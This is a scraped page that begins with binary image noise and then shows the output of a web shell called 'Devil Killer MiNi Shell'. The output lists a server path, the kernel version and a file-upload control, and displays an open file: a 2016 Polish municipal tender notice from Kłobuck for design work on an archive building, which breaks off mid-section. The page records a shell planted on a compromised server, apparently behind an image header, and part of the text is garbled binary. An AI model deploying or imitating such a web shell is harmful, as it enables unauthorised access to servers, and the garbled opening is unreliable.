JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160726/158979-N-2016.html

<p class="kh_header"><b>Kłobuck: Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego dla zadania inwestycyjnego p.n.: Przebudowa budynku przy ul. 11 Listopada 81 w Kłobucku na archiwum zakładowe.</b><br>
<b>Numer ogłoszenia: 158979 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kłobuck , ul. 11 Listopada 6, 42-100 Kłobuck, woj. śląskie, tel. 34 3100150, faks 34 3172661.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminaklobuck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej wraz z pełnieniem nadzoru autorskiego dla zadania inwestycyjnego p.n.: Przebudowa budynku przy ul. 11 Listopada 81 w Kłobucku na archiwum zakładowe..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Informacje ogólne
Budynek, w którym Zamawiający planuje wykonać prace budowlane, mające na celu dostosowanie go do potrzeb pełnienia funkcji archiwum zakładowego, zlokalizowany jest w Kłobucku przy ulicy 11 Listopada 81, na działce ew. nr 591/7. Według danych wynikających z posiadanej dokumentacji projektowej, budynek ten jest dwukondygnacyjny, niepodpiwniczony o wymiarach ok 12,0x24,0 m. Wysokość kondygnacji brutto 3,3 m. W obiekcie mieszczą się pomieszczenia biurowe oraz magazynowe Zarządu Dróg i Gospodarki Komunalnej w Kłobucku. 
Planowane archiwum znajdować się ma na drugiej kondygnacji. 
Prace projektowe poprzedzać ma wykonanie oceny technicznej budynku, która wykaże czy będzie możliwa przebudowa obiektu dla osiągnięcia założonej  funkcji - archiwum zakładowego.
2. Przedmiotem zamówienia jest:
2.1. Wykonanie (przed przygotowaniem projektu budowlanego) ekspertyzy technicznej stanu istniejącego budynku, stwierdzającej jego stan bezpieczeństwa i przydatności do użytkowania, uwzględniającej oddziaływania wywołane jego przebudową na archiwum zakładowe, z uwzględnieniem w szczególności stanu podłoża gruntowego, fundamentów, murów nośnych i stropu.
2.2. Sporządzenie dzieła w postaci kompletnej wielobranżowej dokumentacji projektowo-kosztorysowej, w tym w szczególności projektu budowlanego, projektu wykonawczego, specyfikacji technicznej wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego wraz z przedmiarami robót dotyczących  inwestycji pod nazwą Przebudowa budynku przy ul. 11 Listopada 81 w Kłobucku na archiwum zakładowe.
2.3 Udzielanie pisemnych odpowiedzi i wyjaśnień na pytania dotyczące opracowanej dokumentacji projektowo-kosztorysowej - w przypadku ogłoszenia przez Zamawiającego przetargu na realizację inwestycji na podstawie zamówionej dokumentacji.
2.4 Pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych. 
Zamawiający korzystając z prawa opcji, gwarantuje minimalny poziom zamówienia, obejmujący wykonanie dokumentacji projektowo-kosztowej. Maksymalny poziom zamówienia to taki, który obejmuje również pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych. Rozszerzenie zamówienia poza jego minimalny poziom jest uprawnieniem, a nie obowiązkiem Zamawiającego i będzie realizowane w miarę zaistniałej potrzeby. 
3. Szczegółowy zakres i forma Zamówienia:
3.1. Dokumentacja projektowa powinna uwzględniać w szczególności:
1) wykonanie ekspertyzy technicznej istniejącego budynku, stwierdzającej jego stan bezpieczeństwa i przydatności do użytkowania; poparta badaniami i wyliczeniami wytrzymałości jego fundamentów, ścian, stropów i innych elementów konstrukcji oraz elewacji.
2) przebudowę istniejącego budynku przy ul. 11 Listopada 81. Przebudowa będzie obejmowała branże: architektoniczno - konstrukcyjną, elektryczną i grzewczą i wentylacyjną;  
3.2. Wykonawca, w ramach zamówienia, zobowiązany jest do:
1) dostosowania części budynku do potrzeb archiwum zakładowego;
2) uzyskanie wszelkich niezbędnych opinii i uzgodnień;
3) wykonania ewentualnych badań, analiz i wszelkich innych czynności, niezbędnych dla zrealizowania zamówienia;
4) uzgodnienia z zamawiających propozycji i rozwiązań projektowych
3.3. Ogólne założenia projektowe:
1) utrzymanie dotychczasowej funkcji budynku, w jego części;
2) uzyskanie nowej funkcji budynku związanej z potrzebami archiwum zakładowego, wynikającej z wymogów stawianych tego typu obiektom, w szczególności:
- gabinet do pracy archiwisty;
- miejsca do korzystania z dokumentacji;
- pomieszczeń magazynowych;
UWAGA:
Stałe miejsce pracy do pracy dla archiwisty oraz miejsca do korzystania z dokumentacji nie mogą znajdować się w pomieszczeniach magazynowych.
3) wszystkie przyłącza mają charakter wewnętrzny;
3.4. Informacje dodatkowe, mogące być pomocne przy wycenie oferty 
1) zamawiający załącza zdjęcia obiektu i terenu przyległego;
2) zamawiający załącza projekt budowlany z 1986 r. z opisem i rysunkami budynku (zamawiający zastrzega że nie posiada dokumentów weryfikujących wykonanie budynku w kontekście zgodności z projektem) ;
3) zamawiający zaleca przeprowadzenie wizji w terenie.
3.5. Wymagania dotyczące wykonania:
1) ekspertyzy technicznej budynku, w szczególności:
- sporządzenie inwentaryzacji budynku w zakresie niezbędnym do wykonania ekspertyzy, 
- opis stanu istniejącego elementów konstrukcyjnych budynku zarówno wewnętrznych jak i zewnętrznych, 
- ustalenie aktualnego stanu technicznego budynku wraz z opisem występujących nieprawidłowości (ściany, posadzki, stropy, klatka schodowa, dach, stolarka okienna i drzwiowa), 
- ogólna ocena stanu technicznego i przyczyny wystąpienia uszkodzeń, 
- analiza bezpieczeństwa konstrukcji budynku, 
- podanie zakresu docelowych robót remontowych, 
- wnioski i zalecenia, 
- sporządzenie dokumentacji fotograficznej, 
 2) dokumentacji projektowo - kosztowej:
- projekt budowlany wraz z projektem wykonawczym, wykonanym w takim zakresie, by uzupełniał i uszczegóławiał projekt budowlany w stopniu dokładności niezbędnym do realizacji robót budowlanych oraz sporządzenia oferty przez wykonawcę. 
- projekt (budowlany i wykonawczy) powinien stanowić podstawę do możliwości rozpoczęcia robót budowlanych w trybie przewidzianym przez Prawo budowlane.
- specyfikację techniczną wykonania i odbioru robot budowlanych,
- kosztorys inwestorski wraz z przedmiarem robót (założenia do kosztorysowania wykonawca powinien uzgodnić z zamawiającym),
- informację dotyczącą bezpieczeństwa i ochrony zdrowia,
- świadectwo charakterystyki energetycznej budynku.
3.6. Dokumentacja powinna spełniać w szczególności następujące wymagania: 
1) zgodności z przepisami ustawy Prawa budowlane (tj. z dnia 9 lutego 2016 r. Dz.U. z 2016 r. poz. 290) i rozporządzeń wydanych na jego podstawie, 
2) zgodności z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, 
3) zgodności z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego,
4) zgodnie z art. 29  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych nie może zawierać założeń wskazujących znaki towarowe, patenty lub pochodzenie, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny,
5) zgodności z załącznikiem 6 (Instrukcją archiwalną) do Rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych z dnia 18 stycznia 2011 r. (Dz.U. Nr 14, poz. 67).
3.7. Elementy każdej z części dokumentacji powinny być dostarczone w następującej ilości egzemplarzy:
1) 5 egz. projektu budowlanego i wykonawczego oraz 1 egz. na  nośniku elektronicznym w postaci pliku z rozszerzeniem *.doc    lub *.pdf,
2) 2 egz. przedmiarów oraz jeden egz. na nośniku elektronicznym w postaci pliku z rozszerzeniem *.doc  lub *.pdf,
3) 2 egz. kosztorysu inwestorskiego oraz jeden egz. na nośniku elektronicznym w postaci pliku z rozszerzeniem *.doc  lub *.pdf, 
4) 2 egz. specyfikacji technicznych wykonania i odbioru robót budowlanych oraz jeden egz. na nośniku elektronicznym w postaci pliku z rozszerzeniem *.doc  lub *.pdf,
5) 2 egz. ekspertyzy technicznej,
6) 2 egz. świadectwa charakterystyki energetycznej budynku oraz 1 egz. na  nośniku elektronicznym w postaci pliku  z rozszerzeniem *.doc  lub *.pdf 
3.8. Wymagania dotyczące pełnienia nadzoru autorskiego w trakcie realizacji robót budowlanych Podstawą do świadczenia nadzoru autorskiego będzie wola Zamawiającego wyrażona pisemnie.
Nadzór autorski, będzie realizowany w następujący sposób:
1) nadzór autorski nad realizacją robót budowlanych wraz z pobytem na budowie
2) nadzór autorski rysunkowy - uzupełniający projekt, nie wymagający pobytu na budowie
Zakres nadzoru, wskazanego w punkcie 1) uwzględnia czynności określone w art. 20 ust.1 pkt 4) Prawa budowlanego oraz do 3 pobytów projektanta na budowie. Zakres nadzoru, wskazanego w punkcie 2) uwzględnia wykonanie  planowanych kompletów rysunków uzupełniających projekt w liczbie do 2 wraz z niezbędnym opisem uzupełniającym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego, o którym mowa w art. 67 ust 1 pkt 6 ustawy dotyczącego sprawowania nadzoru autorskiego, w wysokości nie większej niż 30% w przypadku konieczności zwiększenie zakresu usług. Nastąpi to wówczas, gdy planowana ilość nadzorów autorskich NAP (3) lub NAR (2) zostanie wyczerpana a konieczność dalszego wykonywania nadzoru autorskiego będzie niezbędna z punktu widzenia potrzeb Zamawiającego. W tym przypadku Zamawiający udzieli zamówienia uzupełniającego, na podstawie zawartej przez Strony odrębnej umowy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 79.93.30.00-3, 71.22.00.00-6, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie, ponieważ przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania usług będących przedmiotem zamówienia i w związku z tym Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania niniejszego warunku. 

Oceny spełniania warunków udziału w postępowaniu w tym zakresie, dokona na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego warunku w tym zakresie, a oceny spełniania warunków udziału w zakresie posiadania wiedzy i doświadczenia dokona na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu

Oceny spełniania tego warunku Zamawiający dokona na podstawie przedstawionych właściwych dokumentów i oświadczenia na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego warunku w tym zakresie, a oceny spełniania warunków udziału w zakresie dysponowania odpowiednim potencjałem technicznym dokona na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu

Oceny spełniania tego warunku Zamawiający dokona na podstawie przedstawionych właściwych dokumentów i oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił warunek dysponowania osobami, które będą uczestniczyć w wykonywaniu zamówienia, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobą (-ami) zdolną (-nymi) do wykonania zamówienia tj. posiadającą (-cymi) prawo do wykonywania samodzielnych funkcji technicznych w budownictwie, w tym uprawnienia budowlane do projektowania w specjalności:
- architektonicznej bez ograniczeń  lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
- konstrukcyjno-budowlanej bez ograniczeń  lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń  lub odpowiadające im ważne uprawnienia budowlane upoważniające do projektowania przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Uwaga: 
1) Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane, a także ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, oraz w sytuacji określonej w art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa 
2) Zamawiający informuje, iż w przypadku dokonania wyboru oferty Wykonawcy spoza terenu Rzeczypospolitej, wskazane w niniejszym punkcie osoby, które będą uczestniczyć w wykonywaniu niniejszego zamówienia winny posiadać znajomość języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie, bądź też do dyspozycji tych osób w kontaktach z Zamawiającym, Wykonawca zapewni na własny koszt tłumaczy języka polskiego. 
3) Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na osobach zdolnych do wykonania zamówienia będących w dyspozycji innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Ocena tego warunku będzie dokonywana na podstawie właściwego dokumentu przedstawionego przez Wykonawcę na zasadzie formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego warunku udziału w zakresie sytuacji ekonomicznej i finansowej, a oceny spełniania tego warunku dokona na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.

Oceny spełniania tego warunku Zamawiający dokona na podstawie przedstawionych właściwych dokumentów i oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty sporządzony na podstawie wzoru stanowiącego załącznik do SIWZ 
2. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. 
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany do umowy możliwe są jedynie w trybie art. 144 Ustawy Prawo zamówień publicznych. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.
2. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych poniżej warunków ich  wystąpienia oraz warunków zmiany umowy:
